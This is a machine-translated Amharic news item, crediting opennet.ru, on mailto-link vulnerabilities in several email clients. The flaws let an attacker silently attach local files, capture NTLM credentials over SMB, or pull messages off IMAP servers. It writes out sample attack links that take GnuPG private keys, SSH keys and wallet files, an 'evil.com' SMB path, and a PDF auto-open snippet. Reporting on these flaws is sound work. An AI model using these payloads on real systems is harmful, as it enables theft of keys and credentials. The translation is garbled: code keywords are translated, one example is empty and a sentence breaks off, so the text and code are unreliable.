ተመራማሪዎች ከሩር ዩኒቨርሲቲ ቦኩም (ጀርመን)
አገናኞች "
የደብዳቤ ደንበኞች ተንደርበርድ፣ GNOME ኢቮሉሽን (CVE-2020-11879)፣ KDE KMail (CVE-2020-11880)፣ IBM/HCL Notes (CVE-2020-4089) እና ፔጋሰስ ሜይል በራስ-ሰር እንዲያያይዙዎት ለሚያስችል ቀላል ያልሆነ ጥቃት ተጋላጭ ነበሩ። ማንኛውም የአካባቢ ፋይል፣ እንደ "mailto:?attach=path_to_file" ባለው አገናኝ በኩል የተገለጸ። ፋይሉ ማስጠንቀቂያ ሳያሳይ ተያይዟል, ስለዚህ ልዩ ትኩረት ከሌለ ተጠቃሚው ደብዳቤው ከአባሪ ጋር እንደሚላክ ላያስተውል ይችላል.
ለምሳሌ፣ እንደ “mailto:[ኢሜል የተጠበቀ]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" ከGnuPG ወደ ደብዳቤው ውስጥ የግል ቁልፎችን ማስገባት ትችላለህ። እንዲሁም የ crypto wallets (~/.bitcoin/wallet.dat)፣ SSH ቁልፎችን (~/.ssh/id_rsa) እና ለተጠቃሚው ተደራሽ የሆኑ ማናቸውንም ፋይሎች መላክ ይችላሉ። ከዚህም በላይ ተንደርበርድ እንደ "attach=/tmp/*.txt" ያሉ ግንባታዎችን በመጠቀም የፋይሎችን ቡድን በማስክ እንዲያያይዙ ይፈቅድልዎታል።
ከአካባቢያዊ ፋይሎች በተጨማሪ፣ አንዳንድ የኢሜይል ደንበኞች በIMAP አገልጋይ ውስጥ ወደ አውታረ መረብ ማከማቻ እና ዱካዎች አገናኞችን ያዘጋጃሉ። በተለይም IBM Notes እንደ "attach=\\evil.com\dummyfile" ያሉ አገናኞችን ሲያካሂዱ ፋይልን ከአውታረ መረብ ማውጫ እንዲያስተላልፉ ይፈቅድልዎታል እንዲሁም በአጥቂው ቁጥጥር ስር ወዳለው የኤስኤምቢ አገልጋይ አገናኝ በመላክ የ NTLM ማረጋገጫ መለኪያዎችን ያቋርጡ። (ጥያቄው አሁን ካለው የማረጋገጫ መለኪያዎች ተጠቃሚ ጋር ይላካል).
ተንደርበርድ እንደ “attach=imap:///fetch>UID>/INBOX>1/” ያሉ ጥያቄዎችን በተሳካ ሁኔታ ያስኬዳል፣ ይህም በIMAP አገልጋዩ ላይ ካሉ አቃፊዎች ይዘትን እንዲያያይዙ ያስችልዎታል። በተመሳሳይ ጊዜ ከIMAP የተገኙ መልእክቶች በOpenPGP እና S/MIME በኩል የተመሰጠሩ ከመላክዎ በፊት በደብዳቤ ደንበኛው በራስ ሰር ይፈታሉ። የተንደርበርድ ገንቢዎች ነበሩ።
የድሮው የተንደርበርድ ስሪቶች በተመራማሪዎቹ ለቀረቡላቸው በPGP እና S/MIME ላይ ለሌሎች ሁለት የጥቃት ልዩነቶች ተጋላጭ ነበሩ። በተለይም ተንደርበርድ፣እንዲሁም OutLook፣PostBox፣eM Client፣MailMate እና R2Mail2 ቁልፍ የመተኪያ ጥቃት ደርሶባቸዋል፣ይህም ምክኒያት የመልእክት ደንበኛው በኤስ/ኤምአይኤምኢ መልእክት ውስጥ የሚተላለፉ አዳዲስ ሰርተፍኬቶችን በራስ ሰር በማስመጣቱ እና በመጫኑ ነው። አጥቂው አስቀድሞ በተጠቃሚው የተከማቸ የህዝብ ቁልፎችን መተካት ለማደራጀት ነው።
ሁለተኛው ጥቃት፣ ተንደርበርድ፣ ፖስትቦክስ እና ሜይል ሜት የሚጋለጡበት፣ ረቂቅ መልዕክቶችን በራስ-ሰር የማዳን ዘዴን የሚጠቀም እና mailto መለኪያዎችን በመጠቀም ኢንክሪፕት የተደረጉ መልዕክቶችን መፍታት ወይም የዘፈቀደ መልዕክቶች ዲጂታል ፊርማ እንዲጨምር ያስችላል። ውጤቱን ወደ አጥቂው IMAP አገልጋይ ቀጣይ ማስተላለፍ። በዚህ ጥቃት, ምስጢራዊ ጽሑፉ በ "አካል" መለኪያ በኩል ይተላለፋል, እና "meta refresh" መለያ ወደ አጥቂው IMAP አገልጋይ ጥሪ ለመጀመር ጥቅም ላይ ይውላል. ለምሳሌ: ' '
ያለተጠቃሚ መስተጋብር "mailto:" አገናኞችን በራስ-ሰር ለማስኬድ በልዩ ሁኔታ የተነደፉ ፒዲኤፍ ሰነዶችን መጠቀም ይቻላል - በፒዲኤፍ ውስጥ ያለው የOpenAction ድርጊት ሰነድ ሲከፍቱ የመልእክት መቆጣጠሪያውን በራስ-ሰር እንዲያስጀምሩ ያስችልዎታል።
% ፒዲኤፍ-1.5
1 0 obj
<< /ዓይነት / ካታሎግ /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /ዓይነት / ድርጊት / ኤስ / URI / URI (mailto:?body=——የ PGP መልእክት ጀምር——[…])>>
endobj
ምንጭ: opennet.ru